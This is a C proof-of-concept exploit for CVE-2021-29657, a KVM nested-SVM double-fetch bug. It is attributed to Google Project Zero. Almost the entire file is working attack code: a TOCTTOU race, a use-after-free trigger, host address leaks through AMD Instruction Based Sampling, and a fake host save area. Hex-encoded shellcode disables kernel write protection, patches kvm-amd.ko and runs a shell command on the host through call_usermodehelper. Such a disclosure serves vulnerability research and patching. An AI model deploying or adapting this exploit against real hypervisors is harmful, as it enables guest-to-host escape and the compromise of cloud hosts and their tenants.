/*
 * Proof-of-Concept Exploit for CVE-2021-29657
 * (KVM Double Fetch in nested_svm_vmrun)
 * https://bugs.chromium.org/p/project-zero/issues/detail?id=2177
 * fwilhelm@google.com
 */

#include "helper.h"

// Offsets (from Ubuntu kernel-ppa 5.11.8-051108-generic)
// https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.11.8/amd64/

// Rough offset of svm_vcpu_run in kvm-amd.ko.
// We use this to calculate the module base address (which is page aligned)
// from a noisy info leak so no small differences are not a problem.
#define SVM_VCPU_RUN_OFFSET 0x6180

// offset from kvm-amd base to the 'vmsave' instruction in _svm_vcpu_run.
#define VMSAVE_OFFSET 0xf74b

// offset from kvm-amd base to the location where vmsave writes our
// stage0 shellcode. For this implementation this will always be a the same page
// as _svm_vcpu_run and start at offset 0x600.
#define STAGE0_OFFSET (VMSAVE_OFFSET & 0xFF000) + 0x600

// offset from kvm-amd base to unused executable memory, we use this
// to store our stage1 and stage2 payloads.
#define UNUSED_OFFSET 0xf8b5

// Final payload to run.
#define COMMAND "/bin/touch /tmp/helloworld"

// Globals
struct vmcb *vmcb;  // L2 VMCB
struct vmcb *vmcb2; // "L3" VMCB

// L1 value of the MSR_VM_HSAVE_PA. Only used to check that we have access to
// the host MSR
u64 virtual_hsave;

// L1 EFER
u64 efer;

// Pointer to our fake host save area
struct vmcb *fake_hsave;

// Pointer to our scratch page.
// We use this to store the stack for our initial kernel ROP chain and
// to store the stage1 and stage2 payloads before they get copied into
// executable host memory.
u64 *stack;

// Repeatedly flip the INTERCEPT_VMRUN bit to trigger the
// TOCTTOU bug in nested_svm_vmrun
static void flip_intercept(void *v) {
  struct vmcb *vmcb = (struct vmcb *)v;
  while (true) {
    pause();
    pause();
    pause();
    pause();
    pause();
    pause();
    vmcb->control.intercept ^= (1ULL << INTERCEPT_VMRUN);
  }
}

// This function leaks the HPA of a guest page using
// AMD's Instruction Based Sampling. We try to sample
// one of our memory loads/writes to *p, which will
// store the physical memory address in MSR_IBC_DH_PHYS_AD
static u64 leak_guest_hpa(u8 *p) {
  volatile u8 *ptr = p;
  u64 ibs = scatter_bits(0x2, IBS_OP_CUR_CNT_23) |
            scatter_bits(0x10, IBS_OP_MAX_CNT) | IBS_OP_EN;

  while (true) {
    wrmsr(MSR_IBS_OP_CTL, ibs);
    u64 x = 0;

    for (int i = 2; i < 0x1000; i++) {

      x = ptr[i];
      ptr[i] += ptr[i - 1];
      ptr[i] = x;

      if (i % 50 == 0) {
        u64 valid = rdmsr(MSR_IBS_OP_CTL) & IBS_OP_VAL;
        if (valid) {
          u64 op3 = rdmsr(MSR_IBS_OP_DATA3);
          if ((op3 & IBS_ST_OP) || (op3 & IBS_LD_OP)) {
            if (op3 & IBS_DC_PHY_ADDR_VALID) {
              printf("[x] leak_guest_hpa: %lx %lx %lx\n", rdmsr(MSR_IBS_OP_RIP),
                     rdmsr(MSR_IBS_DC_PHYS_AD), rdmsr(MSR_IBS_DC_LIN_AD));
              return rdmsr(MSR_IBS_DC_PHYS_AD) & ~(0xFFF);
            }
          }

          wrmsr(MSR_IBS_OP_CTL, ibs);
        }
      }
    }

    wrmsr(MSR_IBS_OP_CTL, ibs & ~IBS_OP_EN);
  }
}

struct leak {
  u64 module_base;
  u64 phys_base;
};

// Leak the hosts module base for kvm-amd.ko and the host kernel's phys_base
// using AMD's Instruction Based Sampling. We try to sample a host instruction
// that accesses a kernel page through the physmap, by running the following
// steps in a loop:
// 1. Enable IBS op sampling by writing to MSR_IBS_OP_CTL
// 2. Immediately trigger an VM exit using port io
// 3. Read the result MSRs and see if we sampled an instruction that (A)
// performed a memory load/write and where (B) the lower parts of the
// virtual/linear address and the physical address are identical.
// 4. If we find a match, we can extract phys_base by simply substracting the
// physical address from the virtual one and we can we try to calculate the
// kvm-amd.ko module base by looking at the sampled RIP, substracting a rough
// offset and page aligning the result. module_base can be wrong if we sample
// some other non KVM function or get the offset wrong, but we do another sanity
// check in leak_host_hpa to fix this up.
static struct leak leak_host_access(void) {
  u64 ibs = scatter_bits(0x2, IBS_OP_CUR_CNT_23) |
            scatter_bits(0x40, IBS_OP_MAX_CNT) | IBS_OP_EN;

  while (true) {
    wrmsr(MSR_IBS_OP_CTL, ibs & ~IBS_OP_EN);
    wrmsr(MSR_IBS_OP_CTL, ibs);
    outb(0x41, 0x41);

    u64 valid = rdmsr(MSR_IBS_OP_CTL) & IBS_OP_VAL;
    if (valid) {
      u64 op3 = rdmsr(MSR_IBS_OP_DATA3);
      if ((op3 & IBS_ST_OP) || (op3 & IBS_LD_OP)) {

        printf("[x] leak_host_access: %lx %lx %lx\n", rdmsr(MSR_IBS_OP_RIP),
               rdmsr(MSR_IBS_DC_PHYS_AD), rdmsr(MSR_IBS_DC_LIN_AD));
        if (op3 & IBS_DC_PHY_ADDR_VALID) {

          u64 rip = rdmsr(MSR_IBS_OP_RIP);
          u64 phys = rdmsr(MSR_IBS_DC_PHYS_AD);
          u64 lin = rdmsr(MSR_IBS_DC_LIN_AD);

          u64 mask = 0xFFFFFFF;
          if (((lin - phys) & mask) == 0x00000000) {
            printf("[x] leak_host_access: success!\n");
            struct leak l;
            l.phys_base = lin - phys;
            l.module_base = (rip - SVM_VCPU_RUN_OFFSET) & (~0xFFFUL);
            return l;
          }
        }
      }
    }
  }
}

// Leak the HPA of kvm-amd's _svm_vcpu_run using AMD's Instruction Based
// Sampling. We use IBS fetch sampling with a small maximum fetch count and
// compare the sampled RIP with our previosuly leaked module base to reduce the
// chance of leaking a wrong address. If leak_host_hpa (which is more
// error-prone) returned a wrong module_base, this function will fail and we
// retry.
static u64 leak_host_hpa(u64 modbase) {

  u64 ibs = scatter_bits(0x6, IBS_FETCH_CNT) |
            scatter_bits(0x10, IBS_FETCH_MAX_CNT) | IBS_FETCH_EN;

  for (int i = 0; i < 100; i++) {

    wrmsr(MSR_AMD64_IBSFETCHCTL, ibs & ~IBS_FETCH_EN);
    wrmsr(MSR_AMD64_IBSFETCHCTL, ibs);
    outb(0x41, 0x41);

    u64 valid = rdmsr(MSR_AMD64_IBSFETCHCTL) & (1UL << 52);
    u64 lin = rdmsr(MSR_IBS_FETCH_LIN_AD);
    u64 phys = rdmsr(MSR_IBS_FETCH_PHYS_AD);

    printf("[x] leak_host_hpa: %lx %lx %lx\n", valid, lin, phys);

    if (valid && lin >= modbase + 0xF600 && lin <= modbase + 0xffff) {
      return phys & ~(0xFFF);
    }
  }
  return 0;
}

/*
  The stage1 payload has two jobs:
  - Move the host back into a reasonable state by setting MSR_HSAVE_PA
  back to the original value, and restoring RSP and RIP to call the original
  vmexit handler
  - Prepare the execution of our stage2 payload by overwriting
  kvm->arch.kvmclock_update_work.work.func with its address.
  We find the location of kvmclock_update_work by grabbing a
  ptr to vcpu->arch.regs from the top of the host stack and
  calculating the offset to vcpu->kvm

    mov rax, r12
    mov rdx, rax
    mov ecx, 0xc0010117
    shr rdx, 0x20
    wrmsr
    mov rsi, qword ptr [r13+0x5d8]
    mov rsi, qword ptr [rsi]
    mov rsi, qword ptr [rsi-0x210]
    mov qword ptr [rsi+0x15088], r14
    mov rsp, qword ptr [r13+0x5d8]
    jmp qword ptr [r13+0x578]
*/
char stage1[] = "\x4c\x89\xe0\x48\x89\xc2\xb9\x17\x01\x01\xc0\x48"
                "\xc1\xea\x20\x0f\x30\x49\x8b\xb5\xd8\x05\x00\x00"
                "\x48\x8b\x36\x48\x8b\xb6\xf0\xfd\xff\xff\x4c\x89"
                "\xb6\x88\x50\x01\x00\x49\x8b\xa5\xd8\x05\x00\x00"
                "\x41\xff\xa5\x78\x05\x00\x00";

/*
  The stage2 payload executes as part of the kernel global work queue
  and uses call_usermodehelper to run '/bin/sh -c "COMMAND"' on
  the KVM host. As stage2 will be called asynchronously, we
  don't controll its input registers or stack contents so we use rip
  relative addressing to fetch all arguments from the space
  following the payload.
  We don't know the kernel base address, so we fetch
  a relative pointer to printk from kvm-amd's code segment
  to calculate it and find the address of call_usermodehelper.

    lea r11, [rip-0x7ce]
    mov eax, dword ptr [r11]
    movsxd rax, eax
    add rax, r11
    add rax, 0xc0794
    sub rax, 0xbda035
    lea rdi, [rip + 0x20]
    lea rdx, [rip + 0x21]
    lea rsi, [rip + 0x22]
    mov rcx, 1
    call rax
    ret
*/
char stage2[] = "\x4c\x8d\x1d\x32\xf8\xff\xff\x41\x8b\x03\x48\x63"
                "\xc0\x4c\x01\xd8\x48\x05\x94\x07\x0c\x00\x48\x2d"
                "\x35\xa0\xbd\x00\x48\x8d\x3d\x20\x00\x00\x00\x48"
                "\x8d\x15\x21\x00\x00\x00\x48\x8d\x35\x22\x00\x00"
                "\x00\x48\xc7\xc1\x01\x00\x00\x00\xff\xd0\xc3";

// Once l3 executes, we won the TOCTTOU race and can
// trigger the MSR permission bitmap UaF by disabling
// the SVME bit in MSR_EFER. All the fun stuff happens
// in here.
static void l3(void) {

  printf("l3 is executing\n");

  // Prepare our stage0 payload by filling the three *STAR MSRs
  // with the right values. The values of these registers will
  // be written to kvm-amd.ko + STAGE0_OFFSET once we redirect
  // execution at the end of this function.

  // The stage0 payload disables the Write Protect bit in CR0
  // and copies our stage1 and stage2 payload to (the now writable)
  // kvm-amd.ko + UNUSED_OFFSET

  // mov cr0, rbx, jmp
  wrmsr(MSR_STAR, 0x00000003ebc3220f);
  // pop rdi; pop rsi; pop rcx; jmp
  wrmsr(MSR_LSTAR, 0x00000003eb595e5fULL);
  // rep movsb; pop rdi; jmp rdi;
  wrmsr(MSR_CSTAR, 0xe7ff5fa4f3);

  // Trigger the Use After Free
  printf("[x] triggering svm_free_nested\n");
  wrmsr(MSR_EFER, efer & ~EFER_SVME);

  // Loop until the freed MSR permission bitmap page
  // gets reused and we can get access to host
  // MSRs. This version of the exploit does not handle
  // cases where we only get access to some of the required
  // MSRs or temporarily lose access because some of the permission
  // bits get overwritten with 1s. Implementing this is left
  // as an exercise for the reader :)
  u64 hsave;
  do {
    hsave = rdmsr(MSR_VM_HSAVE_PA);
  } while (hsave == virtual_hsave);

  printf("[x] real msr access\n[x] hsave host: %lx hsave virtual: %lx\n", hsave,
         virtual_hsave);

  u64 kvm_amd_hpa = 0;
  struct leak l;
  while (kvm_amd_hpa == 0) {
    // Leak the host kernel phys_base and kvm-amd's module base address
    l = leak_host_access();
    printf("[x] module_base: %lx phys_base: %lx\n", l.module_base, l.phys_base);

    // Try to leak the HPA for one of kvm-amd's code pages.
    // For this version we always target the code page containing _svm_vcpu_run.
    // leak_host_hpa does amall sanity check by comparing the leaked HVA
    // with the previously leaked module base. If this check fails it will
    // return 0 and we repeat both infoleaks
    kvm_amd_hpa = leak_host_hpa(l.module_base);

    if (kvm_amd_hpa == 0) {
      printf("[!] leak failed :( retrying\n");
    }
  }
  printf("[x] kvm-amd.ko target hpa: %lx\n", kvm_amd_hpa);

  // Prepare fake host save area. (Most fields are ignored, only rip/rax/rsp are
  // relevant)
  volatile struct vmcb *ffh = fake_hsave;

  memset(fake_hsave, 0x00, 0x1000);

  fake_hsave->control.clean = 0xFFFFFFFF;
  fake_hsave->save.rflags = 0x0000000000000246;
  fake_hsave->save.rax = kvm_amd_hpa; // RAX is the physical address used as
                                      // destination for the vmsave
  fake_hsave->save.rip =
      l.module_base +
      VMSAVE_OFFSET; // This points to the vmsave instruction in _svm_vcpu_run

  // This is probably not required, but I had some issues with physical page
  // migrations during development (where the host kernel migrates our guest
  // page to a different HPA for better NUMA locality). Adding a small delay +
  // repeated write access seems to help.
  delay(1000000 * 20);
  for (int i = 0; i < 1000; i++) {
    ffh->save.rflags = 0x0000000000000246 & fake_hsave->save.rflags;
  }
  delay(1000000 * 20 * 100);

  // Leak host physical address for the fake hsave struct and our stack/staging
  // page
  u64 hsave_hpa = leak_guest_hpa((void *)fake_hsave);
  u64 stack_hpa = leak_guest_hpa((void *)stack);

  // Point kernel stack to stack[0xF0] after context switch by using
  // the leaked stack hpa and kernel back hva.
  fake_hsave->save.rsp = l.phys_base + stack_hpa + (0xF0 * 0x8);

  printf("[x] stack hpa: %lx fake hsave hpa: %lx\n", stack_hpa, hsave_hpa);

  printf("[x] rip: %lx rsp: %lx\n", fake_hsave->save.rip, fake_hsave->save.rsp);

  void *trampoline = (void *)stack;
  u64 _null = 0;
  u32 offset = 0;

#define copy(source, size)                                                     \
  memcpy(trampoline + offset, source, size);                                   \
  offset += size;

  // Copy stage1 payload to staging area
  copy(stage1, sizeof(stage1) - 1);

  // Copy stage2 payload (function called by the workqueue) and setup right
  // arguments for the call to call_usermodehelper
  copy(stage2, sizeof(stage2) - 1);
  copy(&_null, 8);
  copy("/bin/sh", 8);
  u64 sh_offset = offset;
  copy(&_null, 8);
  // bin/sh
  u64 x = l.module_base + UNUSED_OFFSET + sh_offset;
  copy(&x, 8);
  // -c
  memcpy(trampoline + 0x100, "-c", 3);
  x = l.module_base + UNUSED_OFFSET + 0x100;
  copy(&x, 8);
  // COMMAND
  memcpy(trampoline + 0x103, COMMAND, sizeof(COMMAND));
  x = l.module_base + UNUSED_OFFSET + 0x103;
  copy(&x, 8);
  // NULL
  copy(&_null, 8);

  if (offset >= 0x100) {
    printf("[!] not enough space. fix offsets\n");
    return;
  }
  printf("[?] offset: %x\n", offset);

  printf("[x] address of final payload: %lx\n",
         l.module_base + UNUSED_OFFSET + sizeof(stage1) - 1);

  // rax -- Bytes following this address will be overwritten with guest register
  // values. we just point it to an unused location in our stack page so the
  // writes can be ignored.
  stack[0xF0] = l.phys_base + stack_hpa + 0x200;
  // New value for CR0, disables Write Protection. Used by stage0 payload
  stack[0xF1] = 0x80040033; // rbx
  // Original HSAVE HPA. Used by stage1 payload to restore MSR to original value
  stack[0xF2] = hsave; // r12
  // HSAVE HVA. Used to recover real host RSP/RIP and transfer control back to
  // it
  stack[0xF3] = l.phys_base + hsave; // r13

  // Pointer to stage2. Will be written to kvmclock_update_work.work.func by
  // stage1
  stack[0xF4] = l.module_base + UNUSED_OFFSET + sizeof(stage1) - 1; // r14
  stack[0xF5] = 0;                                                  // r15
  stack[0xF6] = 0;                                                  // rbp
  // Return address from _svm_vcpu_run. Transfer control to stage0 payload
  stack[0xF7] = l.module_base + STAGE0_OFFSET; // RETURN

  // Setup Stage 0 memcpy
  stack[0xF8] = l.module_base + UNUSED_OFFSET; // RDI - Destination
  stack[0xF9] = l.phys_base + stack_hpa;       // RSI - Source
  stack[0xFA] = 0x200;                         // RCX - Length
  // Address of Stage1 to jump to
  stack[0xFB] = l.module_base + UNUSED_OFFSET; // Jump Destination

  printf("[.] please stand by and wait for your shell (eta 5 min)\n");

  // Overwrite HSAVE MSR with pointer to our fake host save area
  wrmsr(MSR_VM_HSAVE_PA, hsave_hpa);

  // Wait for a VMEXIT
  while (true) {
  }
  return;
}

static void l2(void) {
  printf("[x] l2 is executing\n");
  // If the race was successful l3 will be executed.
  // Otherwise we triger a VM exit and try again.
  nested_svm_vmrun(vmcb2, l3);
  exit(0);
}

int main(int ac, char **av) {
  // Basic setup and sanity checks
  setup_vm();

  if (!this_cpu_has(X86_FEATURE_SVM)) {
    printf("SVM not available\n");
    return 1;
  }

  printf("cpu id %d\n", smp_id());
  printf("cpu count %d\n", cpu_count());

  if (cpu_count() < 2) {
    printf("I need at least 2 CPU cores (-smp 2)\n");
    return 1;
  }

  setup_svm();

  fake_hsave = alloc_page();
  fake_hsave->control.clean = 0xff;

  stack = alloc_page();
  stack[0] = 0xFFFFFFFFFF;

  virtual_hsave = rdmsr(MSR_VM_HSAVE_PA);
  efer = rdmsr(MSR_EFER);

  vmcb = alloc_page();
  vmcb2 = alloc_page();

  vmcb_ident(vmcb);
  vmcb_ident(vmcb2);

  // Prepare for the race by spawning our bit flipper on the second core.
  on_cpu_async(1, flip_intercept, vmcb);

  // Try to win the race by repeatedly trying to launch "L3"
  while (true) {
    int exit_reason = _svm_vmrun(vmcb, l2);
    printf("[!] exit reason: 0x%x. let's try again\n", exit_reason);
  }

  return 0;
}
